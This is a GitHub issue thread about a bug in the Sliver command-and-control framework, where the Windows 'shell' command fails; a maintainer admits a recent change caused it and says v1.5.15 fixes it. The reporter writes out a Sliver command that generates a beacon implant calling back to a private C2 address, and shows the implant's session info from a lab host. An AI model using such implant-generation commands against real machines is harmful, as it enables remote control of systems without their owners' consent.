Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Shell command not working #698

Closed
0xJs opened this issue Jun 3, 2022 · 4 comments
Closed

Shell command not working #698

0xJs opened this issue Jun 3, 2022 · 4 comments
Labels
bug Something isn't working

Comments

@0xJs
Copy link

0xJs commented Jun 3, 2022

Describe the bug
I'm trying out sliver but the shell command is not working.

To Reproduce
Steps to reproduce the behavior:

  1. Generate payload: generate beacon -a amd64 -b https://192.168.178.113/0xjs -e -f exe --save /home/user/sliver/http.exe
  2. Running payload on W10 machine. Changing beacon to interactive
  3. Waiting for session and interacting with it. Then typing shell
  4. See error

Expected behavior
Shell should open.

Screenshots
image

sliver (MIGHTY_WHEAT) > info

        Session ID: 55475699-22b3-4d6b-acbd-bf0d22e426f9
              Name: MIGHTY_WHEAT
          Hostname: DESKTOP-P6STLP5
              UUID: d0974d56-008a-a084-d61a-258ef06225b6
          Username: DESKTOP-P6STLP5\user
               UID: S-1-5-21-3654720888-406055277-4223349906-1003
               GID: S-1-5-21-3654720888-406055277-4223349906-513
               PID: 6756
                OS: windows
           Version: 10 build 19044 x86_64
              Arch: amd64
         Active C2: https://192.168.178.113/0xjs
    Remote Address: 192.168.178.152:59211
         Proxy URL: 
Reconnect Interval: 1m0s

Additional context
Firewall and defender are disabled. The http.exe process stops after executing the shell command.

@0xJs
Copy link
Author

0xJs commented Jun 3, 2022

Shell command also not working in the HTB rastalab when deploying a shell there. So prob not linked to my W10 vm. Proxychains works fine.

@mrThe
Copy link
Contributor

mrThe commented Jun 4, 2022

I'm sorry, it's my fault, i broke the windows shells on latest PR. Already find this out yesterday, was hoping no one notices 👀

New PR on the way.

fyi: @moloch--

@0xJs
Copy link
Author

0xJs commented Jun 4, 2022

Haha first time trying out sliver, spend quite some time on trying other stuff thinking I must be doing something wrong. I Also had problems with evil-winrm through the proxychains setup in the sessions. Chisel socks5 works fine.

Good looking project! Will test it out again once the new version is pushed out :)

@moloch-- moloch-- added the bug Something isn't working label Jun 4, 2022
@moloch--
Copy link
Member

moloch-- commented Jun 8, 2022

Should be fixed in v1.5.15

@moloch-- moloch-- closed this as completed Jun 8, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
bug Something isn't working
Projects
None yet
Development

No branches or pull requests

3 participants